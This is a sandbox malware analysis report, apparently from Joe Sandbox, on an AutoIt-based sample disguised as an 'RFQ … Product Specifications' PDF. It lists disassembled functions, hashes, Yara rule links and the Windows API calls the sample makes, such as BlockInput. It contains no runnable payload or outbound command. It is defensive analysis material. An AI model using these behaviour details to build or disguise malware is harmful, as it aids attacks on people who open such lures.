                                                                                                                • Instruction ID: 1aa859e1a18a6b4b5a6c7b9d7086aaee3f33dea963d225fd53e442bd6e8a152f
                                                                                                                • Opcode Fuzzy Hash: 7b64a1ac89eaf7ddef8b96e9934227995e6826d9bb5fe648238a4719d28f28bf
                                                                                                                • Instruction Fuzzy Hash: FAB12B32610A099FD719CF28C886B657BB0FF45364F25C658E99DCF2A2C335D995CB40
                                                                                                                Function 00A5B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 71782bb954a1658a2955c6237640bf5bf6b992b64e810951435f6b5af9199b10
                                                                                                                • Instruction ID: b5f5a2a523b6c9b6d5c8454d0c81de13443bbeb5653891f9f29f5cfc9aa9d5e6
                                                                                                                • Opcode Fuzzy Hash: 71782bb954a1658a2955c6237640bf5bf6b992b64e810951435f6b5af9199b10
                                                                                                                • Instruction Fuzzy Hash: 42125F75A10229DFCF24CF58C8806EEB7F5FF48711F14819AE849EB255DB349A85CBA0
                                                                                                                Function 00ABEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • BlockInput.USER32(00000001), ref: 00ABEABD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockInput
                                                                                                                • String ID:
                                                                                                                • API String ID: 3456056419-0
                                                                                                                • Opcode ID: 4e833d00eaf9ff7602e25df3ea3fdef69ddb82ed67709fd49ae5d2cd317e4190
                                                                                                                • Instruction ID: a1226c189c5c59179253fba63c15d0ea153fc1d83cd0f2035d5b6f09b3e783ec
                                                                                                                • Opcode Fuzzy Hash: 4e833d00eaf9ff7602e25df3ea3fdef69ddb82ed67709fd49ae5d2cd317e4190
                                                                                                                • Instruction Fuzzy Hash: 3FE01A352102049FC710EF69D904E9AF7EDAF987B0F40841AFC4AC7291DAB1E8418BA1
                                                                                                                Function 00A609D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00A603EE), ref: 00A609DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 84ff6973d6509eca804b7c5c9d14ca5aa854edbb14f97df526ef7a3a9dc9f003
                                                                                                                • Instruction ID: d447a1bc44980ef79f38ab8559e4154d7b4cf6bf88a56ec0fa5621472fc6e457
                                                                                                                • Opcode Fuzzy Hash: 84ff6973d6509eca804b7c5c9d14ca5aa854edbb14f97df526ef7a3a9dc9f003
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Function 00A6781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                • Instruction ID: 16b3fd23c16973fe892c8b01dfbca747284c89d7faaebf820270ed5e97f11907
                                                                                                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                • Instruction Fuzzy Hash: F751797263C7055BDB398778895EBBE63F99B1234CF180A09D882D7283CA15EE81D356
                                                                                                                Function 00A76DD9 Relevance: .6, Instructions: 637COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 552a8ca4e2b003512f5e373934ede528a3622612ab4a0f6f6e7ea1ccb7b66059
                                                                                                                • Instruction ID: cae319bb7a2fe72a9264d6a04ad1fcedda45e39c74e119ebb934dcea0bedace3
                                                                                                                • Opcode Fuzzy Hash: 552a8ca4e2b003512f5e373934ede528a3622612ab4a0f6f6e7ea1ccb7b66059
                                                                                                                • Instruction Fuzzy Hash: 9B322522D29F414DD7239634DC6233AA64DAFB73C5F15D737F81AB99A6EB29C4834200
                                                                                                                Function 00A5CC39 Relevance: .6, Instructions: 635COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e5c01fc421a76a69ffd6f743992ae75e6624cc10c3a198a48a059448d7ba2b9e
                                                                                                                • Instruction ID: 93c5ab542e16f06219a5eebe7249f49524e571e8c4159c50d365ccb0723df91f
                                                                                                                • Opcode Fuzzy Hash: e5c01fc421a76a69ffd6f743992ae75e6624cc10c3a198a48a059448d7ba2b9e
                                                                                                                • Instruction Fuzzy Hash: E0323332B00A158FDF28CF29C49467D7BF1FB45371F28812AD89A8B696D630DD85DB40
                                                                                                                Function 00A47920 Relevance: .6, Instructions: 563COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2798c32d7cb9453ef7a509ebb5cfb38242d238b93e9b3c252f0a852dd82c0971
                                                                                                                • Instruction ID: ad1b0ae680caebd025e28c5f6b8be60fd14d4dee814bbf765e5b9b280a56ac31
                                                                                                                • Opcode Fuzzy Hash: 2798c32d7cb9453ef7a509ebb5cfb38242d238b93e9b3c252f0a852dd82c0971
                                                                                                                • Instruction Fuzzy Hash: 3422A074E00609DFDF14DF64C981AAEB7F6FF84300F244529E816AB291EB36AD55CB50
                                                                                                                Function 00A491C0 Relevance: .5, Instructions: 475COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a2d3a53b65b044e98d86a25e723cc78e9e96c53accf070da63c04c0a24082d02
                                                                                                                • Instruction ID: a685bb4729f76a9a11264048d1ddabfeace087e623632440b53d92c3c03c065f
                                                                                                                • Opcode Fuzzy Hash: a2d3a53b65b044e98d86a25e723cc78e9e96c53accf070da63c04c0a24082d02
                                                                                                                • Instruction Fuzzy Hash: E002B4B1E00209EFDF04EF54D981AAEB7B5FF54340F108169E816DB291EB31AE64CB95
                                                                                                                Function 00A79EEE Relevance: .3, Instructions: 294COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 467794e4bb3230abd496898668ee13c4cc9fa6c0304f5c2815d475639d656b58
                                                                                                                • Instruction ID: 4c80921858a752a54d8cd9789480215b930195091b15a3ef0004b4d85f905d52
                                                                                                                • Opcode Fuzzy Hash: 467794e4bb3230abd496898668ee13c4cc9fa6c0304f5c2815d475639d656b58
                                                                                                                • Instruction Fuzzy Hash: 84B12621D2AF814DC72396398875336B65C6FBB6D5F91D31BFC2779D22EB2185834240
                                                                                                                Function 00A67A4A Relevance: .2, Instructions: 237COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ba5856516aa960e2f9b09371950c982edef84ab8555dd9b3161f9568bc1ab77
                                                                                                                • Instruction ID: 4282948d7e70563a0cb410606892ea2313c5deb4178577a8287d47d942065f1c
                                                                                                                • Opcode Fuzzy Hash: 4ba5856516aa960e2f9b09371950c982edef84ab8555dd9b3161f9568bc1ab77
                                                                                                                • Instruction Fuzzy Hash: B2618A7123870956DF349BB88DA5BBF63B8DF5178CF240A1AE843DB281DA15DE82C315
                                                                                                                Function 00A67CA7 Relevance: .2, Instructions: 237COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 764f6e000794b13900539d99a70e420586710b7e539b16adc810130c5869feee
                                                                                                                • Instruction ID: c3cffc7ae53c82fcd3ed1158e5b608c66cf4c02c7fd0213de7f82f0b5fa9b057
                                                                                                                • Opcode Fuzzy Hash: 764f6e000794b13900539d99a70e420586710b7e539b16adc810130c5869feee
                                                                                                                • Instruction Fuzzy Hash: 94618B71628709D7DF388B288951BBF23B8DF4274CF200D5AE943DB281EA16DD468B55
                                                                                                                Function 00A5D064 Relevance: .1, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8152a31f44e554275ed6af8f18d42a5e3a75c8cf1e1a9ed1063ee02296805730
                                                                                                                • Instruction ID: e78224b39d4f638aa99c9729ed22e23e222f80c74ea991e94ce61a3263e41e61
                                                                                                                • Opcode Fuzzy Hash: 8152a31f44e554275ed6af8f18d42a5e3a75c8cf1e1a9ed1063ee02296805730
                                                                                                                • Instruction Fuzzy Hash: 11417FEB94FBC15FF7079734586A145BF24AC2312935D46DFC8808A98BD3D24089C79B
                                                                                                                Function 00AB2046 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 274e11d1bd62d345773d684dcbe061017f923b91e3a5768be1b1d88cc2c16095
                                                                                                                • Instruction ID: 3b1987d281e252d0f9a130f97768d1b304238fea92c0baf5aad8b2a2a325e536
                                                                                                                • Opcode Fuzzy Hash: 274e11d1bd62d345773d684dcbe061017f923b91e3a5768be1b1d88cc2c16095
                                                                                                                • Instruction Fuzzy Hash: 2821BB326205158BD728CF79C8136BE73E9A754310F55862EE4A7C37D1DE35AD04C740
                                                                                                                Function 00AC2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AC2B30
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AC2B43
                                                                                                                • DestroyWindow.USER32 ref: 00AC2B52
                                                                                                                • GetDesktopWindow.USER32 ref: 00AC2B6D
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AC2B74
                                                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00AC2CA3
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00AC2CB1
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2CF8
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00AC2D04
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AC2D40
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2D62
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2D75
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2D80
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AC2D89
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2D98
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AC2DA1
                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2DA8
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AC2DB3
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2DC5
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ADFC38,00000000), ref: 00AC2DDB
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AC2DEB
                                                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00AC2E11
                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00AC2E30
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2E52
                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC303F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                • Opcode ID: 27ceadc4787f3ed5c623e2e8be23de585910567fad2e833d3832b9a08e7faa0d
                                                                                                                • Instruction ID: b816b80e055c12e9ac76b4222e24eb41fc120a85e9cc336996c04234fd634cb3
                                                                                                                • Opcode Fuzzy Hash: 27ceadc4787f3ed5c623e2e8be23de585910567fad2e833d3832b9a08e7faa0d
                                                                                                                • Instruction Fuzzy Hash: C7027E75900215AFDB14DFA4CD89FAE7BB9FB48320F108559F916AB2A1DB70ED01CB60
                                                                                                                Function 00AD70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00AD712F
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00AD7160
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00AD716C
                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00AD7186
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AD7195
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00AD71C0
                                                                                                                • GetSysColor.USER32(00000010), ref: 00AD71C8
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00AD71CF
                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 00AD71DE
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AD71E5
                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00AD7230
                                                                                                                • FillRect.USER32(?,?,?), ref: 00AD7262
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD7284
                                                                                                                  • Part of subcall function 00AD73E8: GetSysColor.USER32(00000012), ref: 00AD7421
                                                                                                                  • Part of subcall function 00AD73E8: SetTextColor.GDI32(?,?), ref: 00AD7425
                                                                                                                  • Part of subcall function 00AD73E8: GetSysColorBrush.USER32(0000000F), ref: 00AD743B
                                                                                                                  • Part of subcall function 00AD73E8: GetSysColor.USER32(0000000F), ref: 00AD7446
                                                                                                                  • Part of subcall function 00AD73E8: GetSysColor.USER32(00000011), ref: 00AD7463
